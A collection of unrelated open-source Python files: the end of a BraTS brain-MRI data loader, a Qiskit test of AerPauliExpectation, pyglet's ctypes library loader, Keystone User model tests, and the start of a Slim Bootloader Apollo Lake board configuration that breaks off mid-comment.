depth = self.desired_depth
height = self.desired_height
width = self.desired_width
return volume[:, start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width]
def get_volume(self, path_flair, path_t1, path_t2, path_t1ce, start_depth, start_height, start_width):
flair = sitk.GetArrayFromImage(sitk.ReadImage(path_flair))
t1 = sitk.GetArrayFromImage(sitk.ReadImage(path_t1))
t2 = sitk.GetArrayFromImage(sitk.ReadImage(path_t2))
t1ce = sitk.GetArrayFromImage(sitk.ReadImage(path_t1ce))
if self.desired_depth > 155:
flair = np.concatenate([flair, np.zeros((self.desired_depth - 155, 240, 240))], axis=0)
t1 = np.concatenate([t1, np.zeros((self.desired_depth - 155, 240, 240))], axis=0)
t2 = np.concatenate([t2, np.zeros((self.desired_depth - 155, 240, 240))], axis=0)
t1ce = np.concatenate([t1ce, np.zeros((self.desired_depth - 155, 240, 240))], axis=0)
if self.scale_intensity_flag:
flair = self.scale_intensity(flair)
t1 = self.scale_intensity(t1)
t2 = self.scale_intensity(t2)
t1ce = self.scale_intensity(t1ce)
if self.shift_intensity_flag:
flair = self.shift_intensity(flair)
t1 = self.shift_intensity(t1)
t2 = self.shift_intensity(t2)
t1ce = self.shift_intensity(t1ce)
if self.normalize_flag == True:
out = self.merge_volumes(self.normalize_one_volume(flair), self.normalize_one_volume(t2), self.normalize_one_volume(t1ce),
self.normalize_one_volume(t1))
else:
out = self.merge_volumes(flair, t2, t1ce, t1)
out = self.crop_volume(out, start_depth, start_height, start_width)
return out
def get_mask_simple(self, path_seg):
try:
seg = sitk.GetArrayFromImage(sitk.ReadImage(path_seg))
except Exception as e:
seg = np.zeros((155, 240, 240))
desired_depth = self.desired_depth
desired_height = self.desired_height
desired_width = self.desired_width
if desired_depth <= 155:
start_depth = np.random.randint(0, 156 - desired_depth)
to_add = 0
else:
start_depth = 0
to_add = desired_depth - 155
desired_depth = 155
start_height = np.random.randint(0, 241 - desired_height)
start_width = np.random.randint(0, 241 - desired_width)
end_depth = start_depth + desired_depth
end_height = start_height + desired_height
end_width = start_width + desired_width
if to_add != 0:
pad_seg = np.zeros((to_add, end_height - start_height, end_width - start_width))
new_seg = seg[start_depth: end_depth, start_height: end_height, start_width: end_width]
if to_add != 0:
new_seg = np.concatenate([new_seg, pad_seg], axis=0)
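        # encode the BraTS labels as three binary channels: whole tumor
        # (any non-zero label), tumor core (labels 1 and 4) and enhancing
        # tumor (label 4)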
final_seg = np.zeros((3, ) + new_seg.shape)
final_seg[0, :, :, :][np.where(new_seg != 0)] = 1
final_seg[1, :, :, :][np.where((new_seg == 4) | (new_seg == 1))] = 1
final_seg[2, :, :, :][np.where(new_seg == 4)] = 1
return final_seg, start_depth, start_height, start_width
def get_mask(self, path_seg):
seg = sitk.GetArrayFromImage(sitk.ReadImage(path_seg))
location = np.where(seg != 0)
min_depth, max_depth = np.min(location[0]), np.max(location[0])
min_height, max_height = np.min(location[1]), np.max(location[1])
min_width, max_width = np.min(location[2]), np.max(location[2])
desired_depth = self.desired_depth
desired_height = self.desired_height
desired_width = self.desired_width
new_volume = np.zeros((desired_depth, desired_height, desired_width))
difference_depth = max_depth - min_depth
difference_height = max_height - min_height
difference_width = max_width - min_width
if difference_depth < desired_depth:
start_depth = np.random.randint(min_depth // 2, min_depth)
end_depth = min(start_depth + desired_depth, 155)
if end_depth == 155:
start_depth = end_depth - desired_depth
else:
dice = np.random.uniform(0, 1)
if dice > 0.5:
start_depth = min_depth
end_depth = start_depth + desired_depth
else:
end_depth = max_depth
start_depth = max_depth - desired_depth
if difference_height < desired_height:
start_height = np.random.randint(min_height // 2, min_height)
end_height = min(start_height + desired_height, 240)
if end_height == 240:
start_height = end_height - desired_height
else:
dice = np.random.uniform(0, 1)
if dice > 0.5:
start_height = min_height
end_height = start_height + desired_height
else:
end_height = max_height
start_height = max_height - desired_height
if difference_width < desired_width:
start_width = np.random.randint(min_width // 2, min_width)
end_width = min(start_width + desired_width, 240)
if end_width == 240:
start_width = end_width - desired_width
else:
dice = np.random.uniform(0, 1)
if dice > 0.5:
start_width = min_width
end_width = start_width + desired_width
else:
end_width = max_width
start_width = max_width - desired_width
new_seg = seg[start_depth: end_depth, start_height: end_height, start_width: end_width]
final_seg = np.zeros((3, ) + new_seg.shape)
final_seg[0, :, :, :][np.where(new_seg != 0)] = 1
final_seg[1, :, :, :][np.where((new_seg == 4) | (new_seg == 1))] = 1
final_seg[2, :, :, :][np.where(new_seg == 4)] = 1
return final_seg, start_depth, start_height, start_width |
the-stack_0_6257 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test AerPauliExpectation """
import itertools
import unittest
from test.python.opflow import QiskitOpflowTestCase
import numpy as np
from qiskit.circuit.library import RealAmplitudes
from qiskit.opflow import (
CX,
AerPauliExpectation,
CircuitSampler,
CircuitStateFn,
H,
I,
ListOp,
Minus,
One,
PauliExpectation,
PauliSumOp,
Plus,
S,
StateFn,
X,
Y,
Z,
Zero,
)
from qiskit.utils import QuantumInstance
class TestAerPauliExpectation(QiskitOpflowTestCase):
"""Pauli Change of Basis Expectation tests."""
def setUp(self) -> None:
super().setUp()
try:
from qiskit import Aer
self.seed = 97
self.backend = Aer.get_backend("aer_simulator")
q_instance = QuantumInstance(
self.backend, seed_simulator=self.seed, seed_transpiler=self.seed
)
self.sampler = CircuitSampler(q_instance, attach_results=True)
self.expect = AerPauliExpectation()
except Exception as ex: # pylint: disable=broad-except
self.skipTest(f"Aer doesn't appear to be installed. Error: '{str(ex)}'")
return
def test_pauli_expect_pair(self):
"""pauli expect pair test"""
op = Z ^ Z
# wvf = (Pl^Pl) + (Ze^Ze)
wvf = CX @ (H ^ I) @ Zero
converted_meas = self.expect.convert(~StateFn(op) @ wvf)
sampled = self.sampler.convert(converted_meas)
self.assertAlmostEqual(sampled.eval(), 0, delta=0.1)
def test_pauli_expect_single(self):
"""pauli expect single test"""
paulis = [Z, X, Y, I]
states = [Zero, One, Plus, Minus, S @ Plus, S @ Minus]
for pauli, state in itertools.product(paulis, states):
converted_meas = self.expect.convert(~StateFn(pauli) @ state)
matmulmean = state.adjoint().to_matrix() @ pauli.to_matrix() @ state.to_matrix()
sampled = self.sampler.convert(converted_meas)
self.assertAlmostEqual(sampled.eval(), matmulmean, delta=0.1)
def test_pauli_expect_op_vector(self):
"""pauli expect op vector test"""
paulis_op = ListOp([X, Y, Z, I])
converted_meas = self.expect.convert(~StateFn(paulis_op))
plus_mean = converted_meas @ Plus
sampled_plus = self.sampler.convert(plus_mean)
np.testing.assert_array_almost_equal(sampled_plus.eval(), [1, 0, 0, 1], decimal=1)
minus_mean = converted_meas @ Minus
sampled_minus = self.sampler.convert(minus_mean)
np.testing.assert_array_almost_equal(sampled_minus.eval(), [-1, 0, 0, 1], decimal=1)
zero_mean = converted_meas @ Zero
sampled_zero = self.sampler.convert(zero_mean)
np.testing.assert_array_almost_equal(sampled_zero.eval(), [0, 0, 1, 1], decimal=1)
sum_zero = (Plus + Minus) * (0.5 ** 0.5)
sum_zero_mean = converted_meas @ sum_zero
sampled_zero_mean = self.sampler.convert(sum_zero_mean)
# !!NOTE!!: Depolarizing channel (Sampling) means interference
# does not happen between circuits in sum, so expectation does
# not equal expectation for Zero!!
np.testing.assert_array_almost_equal(sampled_zero_mean.eval(), [0, 0, 0, 1])
def test_pauli_expect_state_vector(self):
"""pauli expect state vector test"""
states_op = ListOp([One, Zero, Plus, Minus])
paulis_op = X
converted_meas = self.expect.convert(~StateFn(paulis_op) @ states_op)
sampled = self.sampler.convert(converted_meas)
# Small test to see if execution results are accessible
for composed_op in sampled:
self.assertTrue(hasattr(composed_op[0], "execution_results"))
np.testing.assert_array_almost_equal(sampled.eval(), [0, 0, 1, -1], decimal=1)
def test_pauli_expect_op_vector_state_vector(self):
"""pauli expect op vector state vector test"""
paulis_op = ListOp([X, Y, Z, I])
states_op = ListOp([One, Zero, Plus, Minus])
valids = [
[+0, 0, 1, -1],
[+0, 0, 0, 0],
[-1, 1, 0, -0],
[+1, 1, 1, 1],
]
converted_meas = self.expect.convert(~StateFn(paulis_op) @ states_op)
sampled = self.sampler.convert(converted_meas)
np.testing.assert_array_almost_equal(sampled.eval(), valids, decimal=1)
def test_multi_representation_ops(self):
"""Test observables with mixed representations"""
mixed_ops = ListOp([X.to_matrix_op(), H, H + I, X])
converted_meas = self.expect.convert(~StateFn(mixed_ops))
plus_mean = converted_meas @ Plus
sampled_plus = self.sampler.convert(plus_mean)
np.testing.assert_array_almost_equal(
sampled_plus.eval(), [1, 0.5 ** 0.5, (1 + 0.5 ** 0.5), 1], decimal=1
)
@unittest.skip("Skip until https://github.com/Qiskit/qiskit-aer/issues/1249 is closed.")
def test_parameterized_qobj(self):
"""grouped pauli expectation test"""
two_qubit_h2 = (
(-1.052373245772859 * I ^ I)
+ (0.39793742484318045 * I ^ Z)
+ (-0.39793742484318045 * Z ^ I)
+ (-0.01128010425623538 * Z ^ Z)
+ (0.18093119978423156 * X ^ X)
)
aer_sampler = CircuitSampler(
self.sampler.quantum_instance, param_qobj=True, attach_results=True
)
ansatz = RealAmplitudes()
ansatz.num_qubits = 2
observable_meas = self.expect.convert(StateFn(two_qubit_h2, is_measurement=True))
ansatz_circuit_op = CircuitStateFn(ansatz)
expect_op = observable_meas.compose(ansatz_circuit_op).reduce()
def generate_parameters(num):
param_bindings = {}
for param in ansatz.parameters:
values = []
for _ in range(num):
values.append(np.random.rand())
param_bindings[param] = values
return param_bindings
def validate_sampler(ideal, sut, param_bindings):
expect_sampled = ideal.convert(expect_op, params=param_bindings).eval()
actual_sampled = sut.convert(expect_op, params=param_bindings).eval()
self.assertTrue(
np.allclose(actual_sampled, expect_sampled),
f"{actual_sampled} != {expect_sampled}",
)
def get_circuit_templates(sampler):
return sampler._transpiled_circ_templates
def validate_aer_binding_used(templates):
self.assertIsNotNone(templates)
def validate_aer_templates_reused(prev_templates, cur_templates):
self.assertIs(prev_templates, cur_templates)
validate_sampler(self.sampler, aer_sampler, generate_parameters(1))
cur_templates = get_circuit_templates(aer_sampler)
validate_aer_binding_used(cur_templates)
prev_templates = cur_templates
validate_sampler(self.sampler, aer_sampler, generate_parameters(2))
cur_templates = get_circuit_templates(aer_sampler)
validate_aer_templates_reused(prev_templates, cur_templates)
prev_templates = cur_templates
validate_sampler(self.sampler, aer_sampler, generate_parameters(2)) # same num of params
cur_templates = get_circuit_templates(aer_sampler)
validate_aer_templates_reused(prev_templates, cur_templates)
def test_pauli_expectation_param_qobj(self):
"""Test PauliExpectation with param_qobj"""
q_instance = QuantumInstance(
self.backend, seed_simulator=self.seed, seed_transpiler=self.seed, shots=10000
)
qubit_op = (0.1 * I ^ I) + (0.2 * I ^ Z) + (0.3 * Z ^ I) + (0.4 * Z ^ Z) + (0.5 * X ^ X)
ansatz = RealAmplitudes(qubit_op.num_qubits)
ansatz_circuit_op = CircuitStateFn(ansatz)
observable = PauliExpectation().convert(~StateFn(qubit_op))
expect_op = observable.compose(ansatz_circuit_op).reduce()
params1 = {}
params2 = {}
for param in ansatz.parameters:
params1[param] = [0]
params2[param] = [0, 0]
sampler1 = CircuitSampler(backend=q_instance, param_qobj=False)
samples1 = sampler1.convert(expect_op, params=params1)
val1 = np.real(samples1.eval())[0]
samples2 = sampler1.convert(expect_op, params=params2)
val2 = np.real(samples2.eval())
sampler2 = CircuitSampler(backend=q_instance, param_qobj=True)
samples3 = sampler2.convert(expect_op, params=params1)
val3 = np.real(samples3.eval())
samples4 = sampler2.convert(expect_op, params=params2)
val4 = np.real(samples4.eval())
np.testing.assert_array_almost_equal([val1] * 2, val2, decimal=2)
np.testing.assert_array_almost_equal(val1, val3, decimal=2)
np.testing.assert_array_almost_equal([val1] * 2, val4, decimal=2)
def test_list_pauli_sum(self):
"""Test AerPauliExpectation for ListOp[PauliSumOp]"""
test_op = ListOp([PauliSumOp.from_list([("XX", 1), ("ZI", 3), ("ZZ", 5)])])
observable = AerPauliExpectation().convert(~StateFn(test_op))
self.assertIsInstance(observable, ListOp)
self.assertIsInstance(observable[0], CircuitStateFn)
self.assertTrue(observable[0].is_measurement)
def test_expectation_with_coeff(self):
"""Test AerPauliExpectation with coefficients."""
with self.subTest("integer coefficients"):
exp = 3 * ~StateFn(X) @ (2 * Minus)
target = self.sampler.convert(self.expect.convert(exp)).eval()
self.assertEqual(target, -12)
with self.subTest("complex coefficients"):
exp = 3j * ~StateFn(X) @ (2j * Minus)
target = self.sampler.convert(self.expect.convert(exp)).eval()
self.assertEqual(target, -12j)
if __name__ == "__main__":
unittest.main()
|
the-stack_0_6258 | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# Copyright (c) 2008-2020 pyglet contributors
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
"""Functions for loading dynamic libraries.
These extend and correct ctypes functions.
"""
import os
import re
import sys
import ctypes
import ctypes.util
import pyglet
_debug_lib = pyglet.options['debug_lib']
_debug_trace = pyglet.options['debug_trace']
_is_pyglet_doc_run = getattr(sys, "is_pyglet_doc_run", False)
if pyglet.options['search_local_libs']:
script_path = pyglet.resource.get_script_home()
cwd = os.getcwd()
_local_lib_paths = [script_path, os.path.join(script_path, 'lib'), os.path.join(cwd, 'lib')]
if pyglet.compat_platform == 'win32':
os.environ["PATH"] += os.pathsep + os.pathsep.join(_local_lib_paths)
else:
_local_lib_paths = None
class _TraceFunction:
def __init__(self, func):
self.__dict__['_func'] = func
def __str__(self):
return self._func.__name__
def __call__(self, *args, **kwargs):
return self._func(*args, **kwargs)
def __getattr__(self, name):
return getattr(self._func, name)
def __setattr__(self, name, value):
setattr(self._func, name, value)
class _TraceLibrary:
def __init__(self, library):
self._library = library
print(library)
def __getattr__(self, name):
func = getattr(self._library, name)
f = _TraceFunction(func)
return f
if _is_pyglet_doc_run:
class LibraryMock:
"""Mock library used when generating documentation."""
def __getattr__(self, name):
return LibraryMock()
def __setattr__(self, name, value):
pass
def __call__(self, *args, **kwargs):
return LibraryMock()
class LibraryLoader:
platform = pyglet.compat_platform
# this is only for library loading, don't include it in pyglet.platform
if platform == 'cygwin':
platform = 'win32'
def load_library(self, *names, **kwargs):
"""Find and load a library.
More than one name can be specified, they will be tried in order.
Platform-specific library names (given as kwargs) are tried first.
Raises ImportError if library is not found.
"""
if _is_pyglet_doc_run:
return LibraryMock()
if 'framework' in kwargs and self.platform == 'darwin':
return self.load_framework(kwargs['framework'])
if not names:
raise ImportError("No library name specified")
platform_names = kwargs.get(self.platform, [])
if isinstance(platform_names, str):
platform_names = [platform_names]
elif type(platform_names) is tuple:
platform_names = list(platform_names)
if self.platform.startswith('linux'):
for name in names:
libname = self.find_library(name)
platform_names.append(libname or 'lib%s.so' % name)
platform_names.extend(names)
for name in platform_names:
try:
lib = ctypes.cdll.LoadLibrary(name)
if _debug_lib:
print(name)
if _debug_trace:
lib = _TraceLibrary(lib)
return lib
except OSError as o:
path = self.find_library(name)
if path:
try:
lib = ctypes.cdll.LoadLibrary(path)
if _debug_lib:
print(path)
if _debug_trace:
lib = _TraceLibrary(lib)
return lib
except OSError:
pass
elif self.platform == "win32" and o.winerror != 126:
raise ImportError("Unexpected error loading library %s: %s" % (name, str(o)))
raise ImportError('Library "%s" not found.' % names[0])
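    # Typical use of load_library (illustrative; actual names vary by module):
    #   al_lib = pyglet.lib.load_library('openal', win32='openal32',
    #                                    framework='OpenAL')
    # Platform-specific names given as keyword arguments are tried before the
    # generic positional names.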
def find_library(self, name):
return ctypes.util.find_library(name)
@staticmethod
def load_framework(name):
raise RuntimeError("Can't load framework on this platform.")
class MachOLibraryLoader(LibraryLoader):
def __init__(self):
if 'LD_LIBRARY_PATH' in os.environ:
self.ld_library_path = os.environ['LD_LIBRARY_PATH'].split(':')
else:
self.ld_library_path = []
if _local_lib_paths:
# search first for local libs
self.ld_library_path = _local_lib_paths + self.ld_library_path
os.environ['LD_LIBRARY_PATH'] = ':'.join(self.ld_library_path)
if 'DYLD_LIBRARY_PATH' in os.environ:
self.dyld_library_path = os.environ['DYLD_LIBRARY_PATH'].split(':')
else:
self.dyld_library_path = []
if 'DYLD_FALLBACK_LIBRARY_PATH' in os.environ:
self.dyld_fallback_library_path = os.environ['DYLD_FALLBACK_LIBRARY_PATH'].split(':')
else:
self.dyld_fallback_library_path = [os.path.expanduser('~/lib'), '/usr/local/lib', '/usr/lib']
def find_library(self, path):
"""Implements the dylib search as specified in Apple documentation:
http://developer.apple.com/library/content/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/DynamicLibraryUsageGuidelines.html
Before commencing the standard search, the method first checks
the bundle's ``Frameworks`` directory if the application is running
within a bundle (OS X .app).
"""
libname = os.path.basename(path)
search_path = []
if '.dylib' not in libname:
libname = 'lib' + libname + '.dylib'
# py2app support
if getattr(sys, 'frozen', None) == 'macosx_app' and 'RESOURCEPATH' in os.environ:
search_path.append(os.path.join(os.environ['RESOURCEPATH'],
'..',
'Frameworks',
libname))
# conda support
if os.environ.get('CONDA_PREFIX', False):
search_path.append(os.path.join(os.environ['CONDA_PREFIX'], 'lib', libname))
# pyinstaller.py sets sys.frozen to True, and puts dylibs in
# Contents/MacOS, which path pyinstaller puts in sys._MEIPASS
if (hasattr(sys, 'frozen') and hasattr(sys, '_MEIPASS') and
sys.frozen is True and pyglet.compat_platform == 'darwin'):
search_path.append(os.path.join(sys._MEIPASS, libname))
if '/' in path:
search_path.extend([os.path.join(p, libname) for p in self.dyld_library_path])
search_path.append(path)
search_path.extend([os.path.join(p, libname) for p in self.dyld_fallback_library_path])
else:
search_path.extend([os.path.join(p, libname) for p in self.ld_library_path])
search_path.extend([os.path.join(p, libname) for p in self.dyld_library_path])
search_path.append(path)
search_path.extend([os.path.join(p, libname) for p in self.dyld_fallback_library_path])
for path in search_path:
if os.path.exists(path):
return path
return None
@staticmethod
def load_framework(name):
path = ctypes.util.find_library(name)
# Hack for compatibility with macOS > 11.0
if path is None:
frameworks = {
'AGL': '/System/Library/Frameworks/AGL.framework/AGL',
'IOKit': '/System/Library/Frameworks/IOKit.framework/IOKit',
'OpenAL': '/System/Library/Frameworks/OpenAL.framework/OpenAL',
'OpenGL': '/System/Library/Frameworks/OpenGL.framework/OpenGL'
}
path = frameworks.get(name)
if path:
lib = ctypes.cdll.LoadLibrary(path)
if _debug_lib:
print(path)
if _debug_trace:
lib = _TraceLibrary(lib)
return lib
raise ImportError("Can't find framework %s." % name)
class LinuxLibraryLoader(LibraryLoader):
_ld_so_cache = None
_local_libs_cache = None
@staticmethod
def _find_libs(directories):
cache = {}
lib_re = re.compile(r'lib(.*)\.so(?:$|\.)')
for directory in directories:
try:
for file in os.listdir(directory):
match = lib_re.match(file)
if match:
# Index by filename
path = os.path.join(directory, file)
if file not in cache:
cache[file] = path
# Index by library name
library = match.group(1)
if library not in cache:
cache[library] = path
except OSError:
pass
return cache
def _create_ld_so_cache(self):
# Recreate search path followed by ld.so. This is going to be
# slow to build, and incorrect (ld.so uses ld.so.cache, which may
# not be up-to-date). Used only as fallback for distros without
# /sbin/ldconfig.
#
# We assume the DT_RPATH and DT_RUNPATH binary sections are omitted.
directories = []
try:
directories.extend(os.environ['LD_LIBRARY_PATH'].split(':'))
except KeyError:
pass
try:
with open('/etc/ld.so.conf') as fid:
directories.extend([dir.strip() for dir in fid])
except IOError:
pass
directories.extend(['/lib', '/usr/lib'])
self._ld_so_cache = self._find_libs(directories)
def find_library(self, path):
# search first for local libs
if _local_lib_paths:
if not self._local_libs_cache:
self._local_libs_cache = self._find_libs(_local_lib_paths)
if path in self._local_libs_cache:
return self._local_libs_cache[path]
# ctypes tries ldconfig, gcc and objdump. If none of these are
# present, we implement the ld-linux.so search path as described in
# the man page.
result = ctypes.util.find_library(path)
if result:
return result
if self._ld_so_cache is None:
self._create_ld_so_cache()
return self._ld_so_cache.get(path)
if pyglet.compat_platform == 'darwin':
loader = MachOLibraryLoader()
elif pyglet.compat_platform.startswith('linux'):
loader = LinuxLibraryLoader()
else:
loader = LibraryLoader()
load_library = loader.load_library
|
the-stack_0_6259 | import json
from lxml import etree
import unittest2 as unittest
from keystone.models import User
from keystone.test import utils as testutils
class TestModelsUser(unittest.TestCase):
'''Unit tests for keystone/models.py:User class.'''
def test_user(self):
user = User()
self.assertEquals(str(user.__class__),
"<class 'keystone.models.User'>",
"user should be of instance "
"class keystone.models.User but instead "
"was '%s'" % str(user.__class__))
self.assertIsInstance(user, dict, "")
def test_user_static_properties(self):
user = User(id=1, name="the user", blank=None)
self.assertEquals(user.id, 1)
self.assertEquals(user.name, "the user")
self.assertRaises(AttributeError, getattr, user,
'some_bad_property')
def test_user_properties(self):
user = User(id=1, name="the user", blank=None)
user["dynamic"] = "test"
self.assertEquals(user["dynamic"], "test")
def test_user_json_serialization(self):
user = User(id=1, name="the user", blank=None)
user["dynamic"] = "test"
json_str = user.to_json()
d1 = json.loads(json_str)
d2 = json.loads('{"user": {"name": "the user", \
"id": 1, "dynamic": "test"}}')
self.assertDictEqual(d1, d2)
def test_user_xml_serialization(self):
user = User(id=1, name="the user", blank=None)
xml_str = user.to_xml()
self.assertTrue(testutils.XMLTools.xmlEqual(xml_str,
'<user name="the user" id="1"/>'))
def test_user_json_deserialization(self):
user = User.from_json('{"name": "the user", "id": 1}',
hints={"contract_attributes": ['id', 'name']})
self.assertIsInstance(user, User)
self.assertEquals(user.id, 1)
self.assertEquals(user.name, "the user")
def test_user_xml_deserialization(self):
user = User(id=1, name="the user", blank=None)
self.assertIsInstance(user, User)
def test_user_inspection(self):
user = User(id=1, name="the user", blank=None)
self.assertFalse(user.inspect())
def test_user_validation(self):
user = User(id=1, name="the user", blank=None)
self.assertTrue(user.validate())
if __name__ == '__main__':
unittest.main()
|
the-stack_0_6260 | ## @file
# This file is used to provide board specific image information.
#
# Copyright (c) 2017 - 2020, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
import os
import sys
sys.dont_write_bytecode = True
sys.path.append (os.path.join('..', '..'))
from BuildLoader import FLASH_MAP, BaseBoard, STITCH_OPS, HASH_USAGE
from BuildLoader import IPP_CRYPTO_OPTIMIZATION_MASK, IPP_CRYPTO_ALG_MASK
#
# Temporary Memory Layout for APL
#
# FF000000 +--------------------------+
# | Stage1B |
# | (Decompressed) |
# FEF80000 +--------------------------+
# | Stage1 Heap/Stack |
# FEF70000 +--------------------------+
# | Not Used |
# +-------------+------------+
# | Free |
# | |------------|
# +-------------+ MRC NVS |
# | | |
# FEF40000 +- Stage1B -+------------+
# | Compressed | FSP Mem |
# FEF16000 | +------------+
# | | |
# FEF10000 --------------+------------+
# | N/A (Don't use) |
# FEF08000 +--------------------------+
# | Stage1A |
# FEF00000 +--------------------------+
#
class Board(BaseBoard):
def __init__(self, *args, **kwargs):
super(Board, self).__init__(*args, **kwargs)
self.VERINFO_IMAGE_ID = 'SB_APLI '
self.VERINFO_PROJ_MAJOR_VER = 1
self.VERINFO_PROJ_MINOR_VER = 0
self.VERINFO_SVN = 1
self.VERINFO_BUILD_DATE = '05/20/2018'
self.BOARD_NAME = 'apl'
self.BOARD_PKG_NAME = 'ApollolakeBoardPkg'
self.SILICON_PKG_NAME = 'ApollolakePkg'
self._PCI_ENUM_DOWNGRADE_PMEM64 = 1
self.PCI_IO_BASE = 0x00001000
self.PCI_MEM32_BASE = 0x80000000
self.PCI_MEM64_BASE = 0x400000000
self.FLASH_SIZE = 0x800000
self.FLASH_BASE = self.FLASH_LAYOUT_START - self.FLASH_SIZE
self.HAVE_VBT_BIN = 1
self.HAVE_VERIFIED_BOOT = 1
self.HAVE_MEASURED_BOOT = 0
self.HAVE_SEED_LIST = 0
self.HAVE_PSD_TABLE = 1
self.ENABLE_SMBIOS = 1
self.ENABLE_FSP_LOAD_IMAGE = 0
self.ENABLE_VTD = 1
self.ENABLE_FWU = 1
self.ENABLE_SPLASH = 1
self.ENABLE_FRAMEBUFFER_INIT = 1
self.ENABLE_GRUB_CONFIG = 1
self.ENABLE_DMA_PROTECTION = 0
        # G9 Opt for SHA384 | W7 Opt for SHA384 | Ni Opt for SHA256 | V8 Opt for SHA256
self.ENABLE_CRYPTO_SHA_OPT = IPP_CRYPTO_OPTIMIZATION_MASK['SHA256_NI']
        # To enable source debug, set self.ENABLE_SOURCE_DEBUG to 1:
# self.ENABLE_SOURCE_DEBUG = 1
        # Temporarily skip Stage1A source debug due to the 32KB (IBBL) size
        # limitation, until library size optimization is done.
# If ENABLE_SOURCE_DEBUG is disabled, SKIP_STAGE1A_SOURCE_DEBUG will be ignored
self.SKIP_STAGE1A_SOURCE_DEBUG = 1
# BIT0:Serial BIT1:USB KB
# Support serial port input console by default
self.CONSOLE_IN_DEVICE_MASK = 0x00000001
# BIT0:Serial BIT1:GFX
self.CONSOLE_OUT_DEVICE_MASK = 0x00000001
# Mem | NVMe | Usb | Spi | Ufs | eMMC | SD | Sata
self.BOOT_MEDIA_SUPPORT_MASK = 0xBF
# EXT | FAT
self.FILE_SYSTEM_SUPPORT_MASK = 3
# Verify required minimum FSP version
self.MIN_FSP_REVISION = 0x01040301
# Verify FSP image ID. Empty string means skipping verification
self.FSP_IMAGE_ID = '$APLFSP$'
self.STAGE1A_SIZE = 0x00008000
self.STAGE1B_SIZE = 0x00035000
if self.ENABLE_SOURCE_DEBUG:
self.STAGE1B_SIZE += 0x2000
self.STAGE2_SIZE = 0x00032000
self.PAYLOAD_SIZE = 0x0001F000
if len(self._PAYLOAD_NAME.split(';')) > 1:
# EPAYLOAD is specified
self.EPAYLOAD_SIZE = 0x00130000
self.UEFI_VARIABLE_SIZE = 0x00040000
else:
# EPAYLOAD does not exist, create a dummy one
self.EPAYLOAD_SIZE = 0x1000
self.UEFI_VARIABLE_SIZE = 0x1000
if self.FSPDEBUG_MODE == 1:
self.STAGE1B_SIZE += 0x00009000
self.STAGE2_SIZE += 0x0000F000
self.STAGE1A_XIP = 0
self.STAGE1A_LOAD_BASE = 0xFEF00000
self.STAGE1B_XIP = 0
self.STAGE1B_LOAD_BASE = 0xFEF10000
self.STAGE1B_FD_BASE = 0xFEF80000
self.STAGE1B_FD_SIZE = 0x0006B000
if self.RELEASE_MODE == 0:
self.STAGE1B_FD_SIZE += 0x00002000
self.PAYLOAD_SIZE += 0x00005000
# For Stage2, it is always compressed.
# if STAGE2_LOAD_HIGH is 1, STAGE2_FD_BASE will be ignored
self.STAGE2_FD_BASE = 0x01000000
self.STAGE2_FD_SIZE = 0x00080000
self.STAGE2_LOAD_BASE = 0x00100000
self.STAGE1_STACK_SIZE = 0x00002000
self.STAGE1_DATA_SIZE = 0x0000E000
# Offset is relative to the temporary memory base 0xFEF00000
self.STAGE1_STACK_BASE_OFFSET = 0x00080000 - (self.STAGE1_STACK_SIZE + self.STAGE1_DATA_SIZE)
# To support large payload such as UEFI
self.LOADER_RSVD_MEM_SIZE = 0x00B8C000
self.PLD_RSVD_MEM_SIZE = 0x00500000
self.PLD_HEAP_SIZE = 0x04000000
self.FWUPDATE_SIZE = 0x00020000
self.CFGDATA_SIZE = 0x00004000
self.KEYHASH_SIZE = 0x00001000
self.CFG_DATABASE_SIZE = self.CFGDATA_SIZE
self.MRCDATA_SIZE = 0x00004000
self.VARIABLE_SIZE = 0x00002000
self.S3_DEBUG = 0
self.SBLRSVD_SIZE = 0x00001000
if len(self._PAYLOAD_NAME.split(';')) > 1:
self.SPI_IAS1_SIZE = 0x00001000
else:
self.SPI_IAS1_SIZE = 0x00150000
self._CFGDATA_INT_FILE = ['CfgData_Int_LeafHill.dlt']
self._CFGDATA_EXT_FILE = ['CfgData_Ext_Gpmrb.dlt', 'CfgData_Ext_Up2.dlt','CfgData_Ext_OxbHill.dlt','CfgData_Ext_MB3.dlt','CfgData_Ext_JuniperHill.dlt']
        # If multiple VBT table support is required, list them as:
# {VbtImageId1 : VbtFileName1, VbtImageId2 : VbtFileName2, ...}
# VbtImageId is ID to identify a VBT image. It is a UINT32 number to match
